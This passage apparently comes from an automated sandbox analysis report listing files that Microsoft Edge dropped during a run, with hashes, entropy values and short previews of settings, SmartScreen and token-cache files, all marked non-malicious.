Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF431da.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09070415006215
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMuwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6ctbz8hu3VlXr4CRo1
MD5:	D01568BAC0ABB6D1E906F3932C1CE211
SHA1:	CC5230DA5D3CA24888A0F488BEDD524139E60DB0
SHA-256:	A8B93079F46C867A7C903B05226F8F49CE5AE73487621FB4D718066E12D4914B
SHA-512:	60770072EF65C050CE6FCC0E402B2B74B740DD4A2851545C91AF6F5A9755F896B565AE443F0FA58233B64F1D5BC4F1072A3181F9586CF0D94689AFE21DCD3487
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF431e9.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09070415006215
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMuwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6ctbz8hu3VlXr4CRo1
MD5:	D01568BAC0ABB6D1E906F3932C1CE211
SHA1:	CC5230DA5D3CA24888A0F488BEDD524139E60DB0
SHA-256:	A8B93079F46C867A7C903B05226F8F49CE5AE73487621FB4D718066E12D4914B
SHA-512:	60770072EF65C050CE6FCC0E402B2B74B740DD4A2851545C91AF6F5A9755F896B565AE443F0FA58233B64F1D5BC4F1072A3181F9586CF0D94689AFE21DCD3487
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF43535.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09070415006215
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMuwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6ctbz8hu3VlXr4CRo1
MD5:	D01568BAC0ABB6D1E906F3932C1CE211
SHA1:	CC5230DA5D3CA24888A0F488BEDD524139E60DB0
SHA-256:	A8B93079F46C867A7C903B05226F8F49CE5AE73487621FB4D718066E12D4914B
SHA-512:	60770072EF65C050CE6FCC0E402B2B74B740DD4A2851545C91AF6F5A9755F896B565AE443F0FA58233B64F1D5BC4F1072A3181F9586CF0D94689AFE21DCD3487
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF45cb3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09070415006215
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMuwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6ctbz8hu3VlXr4CRo1
MD5:	D01568BAC0ABB6D1E906F3932C1CE211
SHA1:	CC5230DA5D3CA24888A0F488BEDD524139E60DB0
SHA-256:	A8B93079F46C867A7C903B05226F8F49CE5AE73487621FB4D718066E12D4914B
SHA-512:	60770072EF65C050CE6FCC0E402B2B74B740DD4A2851545C91AF6F5A9755F896B565AE443F0FA58233B64F1D5BC4F1072A3181F9586CF0D94689AFE21DCD3487
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF47849.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09070415006215
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMuwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6ctbz8hu3VlXr4CRo1
MD5:	D01568BAC0ABB6D1E906F3932C1CE211
SHA1:	CC5230DA5D3CA24888A0F488BEDD524139E60DB0
SHA-256:	A8B93079F46C867A7C903B05226F8F49CE5AE73487621FB4D718066E12D4914B
SHA-512:	60770072EF65C050CE6FCC0E402B2B74B740DD4A2851545C91AF6F5A9755F896B565AE443F0FA58233B64F1D5BC4F1072A3181F9586CF0D94689AFE21DCD3487
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF49f1b.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09070415006215
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMuwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6ctbz8hu3VlXr4CRo1
MD5:	D01568BAC0ABB6D1E906F3932C1CE211
SHA1:	CC5230DA5D3CA24888A0F488BEDD524139E60DB0
SHA-256:	A8B93079F46C867A7C903B05226F8F49CE5AE73487621FB4D718066E12D4914B
SHA-512:	60770072EF65C050CE6FCC0E402B2B74B740DD4A2851545C91AF6F5A9755F896B565AE443F0FA58233B64F1D5BC4F1072A3181F9586CF0D94689AFE21DCD3487
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF4dfcd.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.09070415006215
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMuwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEQ6ctbz8hu3VlXr4CRo1
MD5:	D01568BAC0ABB6D1E906F3932C1CE211
SHA1:	CC5230DA5D3CA24888A0F488BEDD524139E60DB0
SHA-256:	A8B93079F46C867A7C903B05226F8F49CE5AE73487621FB4D718066E12D4914B
SHA-512:	60770072EF65C050CE6FCC0E402B2B74B740DD4A2851545C91AF6F5A9755F896B565AE443F0FA58233B64F1D5BC4F1072A3181F9586CF0D94689AFE21DCD3487
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5991525245677781
Encrypted:	false
SSDEEP:	12:TLHiAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isaVzmdnFAd9U9ez/qS9i:TLCOUOq0afDdWec9sJceZ7J5fc
MD5:	B1DEE99B9F62E4B3807BCEA5D9FFB2E6
SHA1:	715E0C5E4339D57F68F51B483AC6751F2ACDE824
SHA-256:	984BC4BDC3DB31BFB88FEC8960742AF28F1F33459166A9513BA0230A71FD92C2
SHA-512:	CF0F61583873062762677E08EA8184EFBF6AF1CD219BD9FA1D7DE7084F30318F3372152A70AB9789683D0FAB6CBA55E0DEF8DAD441896202D847930477491743
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	50
Entropy (8bit):	3.9904355005135823
Encrypted:	false
SSDEEP:	3:0xXF/XctY5GUf+:0RFeUf+
MD5:	E144AFBFB9EE10479AE2A9437D3FC9CA
SHA1:	5AAAC173107C688C06944D746394C21535B0514B
SHA-256:	EB28E8ED7C014F211BD81308853F407DF86AEBB5F80F8E4640C608CD772544C2
SHA-512:	837D15B3477C95D2D71391D677463A497D8D9FFBD7EB42E412DA262C9B5C82F22CE4338A0BEAA22C81A06ECA2DF7A9A98B7D61ECACE5F087912FD9BA7914AF3F
Malicious:	false
Preview:	topTraffic_170540185939602997400506234197983529371

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\topTraffic_170540185939602997400506234197983529371

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	575056
Entropy (8bit):	7.999649474060713
Encrypted:	true
SSDEEP:	12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
MD5:	BE5D1A12C1644421F877787F8E76642D
SHA1:	06C46A95B4BD5E145E015FA7E358A2D1AC52C809
SHA-256:	C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
SHA-512:	FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
Malicious:	false
Preview:	...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(\|.6.:..f!.>...?M.8......P.D.J.I4.<....y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z.{nZ~d.V.4.u.K.V.......X.<p..cz..>....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	86
Entropy (8bit):	4.3751917412896075
Encrypted:	false
SSDEEP:	3:YQ3JYq9xSs0dMEJAELJ2rjozQw:YQ3Kq9X0dMgAEwj2
MD5:	16B7586B9EBA5296EA04B791FC3D675E
SHA1:	8890767DD7EB4D1BEAB829324BA8B9599051F0B0
SHA-256:	474D668707F1CB929FEF1E3798B71B632E50675BD1A9DCEAAB90C9587F72F680
SHA-512:	58668D0C28B63548A1F13D2C2DFA19BCC14C0B7406833AD8E72DFC07F46D8DF6DED46265D74A042D07FBC88F78A59CB32389EF384EC78A55976DFC2737868771
Malicious:	false
Preview:	{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":2}

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.85437257359579
Encrypted:	false
SSDEEP:	48:uiTrlKxrgxExl9Il8uv7F3JzVP6xlBlQGojYBd1rc:mJYVF5h6xbmGTi
MD5:	7FBB6C53799B05BF4EBD2114B53C4F71
SHA1:	A903C1547C770AAF66B4FEC6C2D944E5A28C39FC
SHA-256:	5B4AB69BC5554706EFEB5DBB7B436DA62CE493F53F5AE0FDC4E9EE8F5E609F4D
SHA-512:	BEA92567ABF75E7C3316291E01492F15341939C7B4A8FA4A3C91E12CB4CBB8AA94CCC6180E066ACD8F19FD1075CFADE5FFBD13C5A1D81030589A6A819C210A31
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.H.J.i.c.4./.f.2.g.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.B.b.x.8.d.C.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	3.9909403384651765
Encrypted:	false
SSDEEP:	96:xYY7918TpQpBAerzPYLDcRVd2dblMy5IWNoC:xfx1sUBAKzAfLWijqC
